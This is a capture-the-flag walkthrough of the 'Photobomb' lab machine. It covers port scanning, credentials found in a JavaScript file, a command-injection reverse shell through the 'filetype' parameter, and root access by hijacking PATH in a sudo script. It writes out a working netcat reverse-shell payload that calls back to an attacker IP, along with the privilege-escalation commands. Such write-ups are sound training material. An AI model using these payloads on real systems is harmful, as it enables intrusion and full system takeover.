Photobomb

Target IP: 10.129.228.60
Challenge Description: N/A.


Reconnaissance

f54518d5888da43c8e246cdc9d46a2c4.png
Performing a port scan using the command sudo nmap -sS 10.129.228.60 -p- shows there are two TCP ports open on the target machine: SSH and HTTP on their standard ports, as shown above.

b6ff94fc30ba7797b5abc3d9dab7af0e.png
I performed an aggressive port scan against the two TCP ports and obtained the result shown above. The command I used is sudo nmap -sV -A 10.129.228.60 -p 22,80. I will start enumeration with the HTTP application on port 80 first. I inserted the hostname photobomb.htb inside my /etc/hosts file first.


Enumeration

Port 80: HTTP
c3c78de70f898b7dd32a22238f830258.png
The webpage above is displayed for this web application. I notice there is a hyperlink with the name click here! to login?

5f2e7419b0995449bbe09f33acfc56d6.png
Pressing the click here! hyperlink informs me to login. However, I do not have any credentials at the moment. I tried default credentials such as admin:admin, but I had no luck. I notice if the authentication is successful, the web application will redirect me to http://photobomb.htb/printer. Time to enumerate further.

17ebaa34597ae468a15ea3208283b81c.png
Reading through the source-code of the webpage contains the JavaScript file with the name photobomb.js, as shown above. Maybe I can find more information about the web application, such as the scripts?

2e81763d9fc67a5f079373c8ecf5d491.png
And bingo! The photobomb.js JavaScript file contains the credentials pH0t0:b0Mb!, as shown above. Time to put this to work. There is also another interesting name called Jameson -- maybe this is useful for SSH? I will note this down.

59f66e00f9cc75fda502a38f7edb48e7.png
I managed to successfully login with the credentials I found inside the JavaScript file, as shown above. This webpage seems to contain a bunch of pictures that I can download in different sizes and file type. I downloaded one picture as a test and it worked successfully.

1c0a342f5dddb007cba949ee15da5140.png
I started burpsuite and then pressed the Download Photo to Print button after selecting an image. After intercepting the request, I identified three interesting parameters: photo, filetype, and dimensions, as shown above. Maybe I can perform command injection? I had no luck with in-band command injection; however I notice the parameter filetype is vulnerable to out-of-band command injection. The payload I tested is sleep(3) and the web application hanged. Time to obtain a reverse shell connection now.


Exploitation

524fc382d219ce5cdd8f9992ecf2dc9c.png
I started a listener on my machine at port 8443. Then I used the payload jpg|rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.132%208443%20%3E%2Ftmp%2Ff inside the filetype parameter. And I successfully obtained a reverse shell connection on my machine at port 8443, as shown above. Now I have a foothold on the target machine with the session as wizard.


Privilege Escalation

981d52a844a8bfa6e5d3435df843cdaf.png
Running the command sudo -l returns the result shown above. The entry (root) SETENV: NOPASSWD: /opt/cleanup.sh shows the script /opt/cleanup.sh can be run as root by the wizard user through sudo. Since I have the ability to SETENV as root. This means that we can set any environment variable.

65174cac6474e1564c08dd15e4414e08.png
Running cat on /opt/cleanup.sh contains the script shown above. I notice the binary find is being used without full path. And the script seems to operate in the /home/wizard/photobomb directory. Therefore, I can create a malicious find binary in the directory and run it to obtain a root shell :)

48cd5ad66bcd3a582712fd21985e6d58.png
First, I created a bash binary with the name find at /home/wizard/photobomb with the command echo "bash" > find. Then, I changed the permission of the binary to be executable using chmod +x find. And finally, I took advantage of the path to specify that this directory /home/wizard/photobomb should be appended to the path by using the command sudo PATH=$PWD:$PATH /opt/cleanup.sh. Therefore, now it should execute the bash binary with the name find. And bingo! Now I have a root shell on the target machine as shown above. GG :)


Flags

7371b410a7225ad99f121060a96d3405.png
The two flags are shown above.